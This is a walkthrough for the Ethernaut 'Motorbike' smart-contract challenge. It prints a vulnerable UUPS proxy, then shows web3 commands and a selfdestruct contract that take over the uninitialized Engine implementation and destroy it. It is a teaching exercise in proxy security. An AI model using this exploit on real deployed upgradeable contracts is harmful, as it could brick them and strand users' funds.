Ethernaut Level 25: Motorbike
Solidity Code
// SPDX-License-Identifier: MIT
pragma solidity <0.7.0;
import "@openzeppelin/contracts/utils/Address.sol";
import "@openzeppelin/contracts/proxy/Initializable.sol";
contract Motorbike {
// keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1
bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
struct AddressSlot {
address value;
}
// Initializes the upgradeable proxy with an initial implementation specified by `_logic`.
constructor(address _logic) public {
require(Address.isContract(_logic), "ERC1967: new implementation is not a contract");
_getAddressSlot(_IMPLEMENTATION_SLOT).value = _logic;
(bool success,) = _logic.delegatecall(
abi.encodeWithSignature("initialize()")
);
require(success, "Call failed");
}
// Delegates the current call to `implementation`.
function _delegate(address implementation) internal virtual {
// solhint-disable-next-line no-inline-assembly
assembly {
calldatacopy(0, 0, calldatasize())
let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0)
returndatacopy(0, 0, returndatasize())
switch result
case 0 { revert(0, returndatasize()) }
default { return(0, returndatasize()) }
}
}
// Fallback function that delegates calls to the address returned by `_implementation()`.
// Will run if no other function in the contract matches the call data
fallback () external payable virtual {
_delegate(_getAddressSlot(_IMPLEMENTATION_SLOT).value);
}
// Returns an `AddressSlot` with member `value` located at `slot`.
function _getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) {
assembly {
r_slot := slot
}
}
}
contract Engine is Initializable {
// keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1
bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
address public upgrader;
uint256 public horsePower;
struct AddressSlot {
address value;
}
function initialize() external initializer {
horsePower = 1000;
upgrader = msg.sender;
}
// Upgrade the implementation of the proxy to `newImplementation`
// subsequently execute the function call
function upgradeToAndCall(address newImplementation, bytes memory data) external payable {
_authorizeUpgrade();
_upgradeToAndCall(newImplementation, data);
}
// Restrict to upgrader role
function _authorizeUpgrade() internal view {
require(msg.sender == upgrader, "Can't upgrade");
}
// Perform implementation upgrade with security checks for UUPS proxies, and additional setup call.
function _upgradeToAndCall(
address newImplementation,
bytes memory data
) internal {
// Initial upgrade and setup call
_setImplementation(newImplementation);
if (data.length > 0) {
(bool success,) = newImplementation.delegatecall(data);
require(success, "Call failed");
}
}
// Stores a new address in the EIP1967 implementation slot.
function _setImplementation(address newImplementation) private {
require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract");
AddressSlot storage r;
assembly {
r_slot := _IMPLEMENTATION_SLOT
}
r.value = newImplementation;
}
}
Requirements
selfdestructengine and makeMotorbikeunusable.
Concepts
- EIP-1967.
- UUPS upgradeable pattern.
- Initializable contract.
Hack
The Engine contract has no selfdestruct method and thus we are unable to make Motorbike unusable. However, we can use upgradeToAndCall to assign a new contract with a selfdestruct method. To execute upgradeToAndCall we need to pass the _authorizeUpgrade check. This requires that we are the upgrader. We can modify this state variable by calling the initialize method of Engine. The catch is that we have to call the method directly instead of using the proxy.
Solution
We first need to get the address of Engine and according to the EIP-1967: Standard, it can be accessed at storage slot 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc. This is also the _IMPLEMENTATION_SLOT defined in Motorbike.
engine = await web3.eth.getStorageAt(contract.address, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc')
engine = engine = '0x' + engine.slice(-40)
Now we call the initialize method. Note that since we are calling directly to Engine, we are also reading and modifying from its storage slot.
initialize = web3.eth.abi.encodeFunctionSignature("initialize()")
await web3.eth.sendTransaction({ from: player, to: engine, data: initialize })
Now we are the upgrader of the contract. We deploy our malicious contract that will be the new implementation.
// SPDX-License-Identifier: MIT
pragma solidity <0.7.0;
contract EngineDestroy {
function destruct() public {
selfdestruct(address(0));
}
}
Next, we create the function data of destruct and upgradeToAndCall.
destroyAddress = EngineDestroyAddress
destruct = web3.eth.abi.encodeFunctionSignature("destruct()")
signature = {
name: 'upgradeToAndCall',
type: 'function',
inputs: [
{
type: 'address',
name: 'newImplementation'
},
{
type: 'bytes',
name: 'data'
}
]
}
params = [destroyAddress, destruct]
data = web3.eth.abi.encodeFunctionCall(signature, params)
We then sent the data to the Engine contract.
await web3.eth.sendTransaction({from: player, to: engine, data: data})
This should cause the Engine to upgrade to the destroyAddress and then call the destruct method.
Done!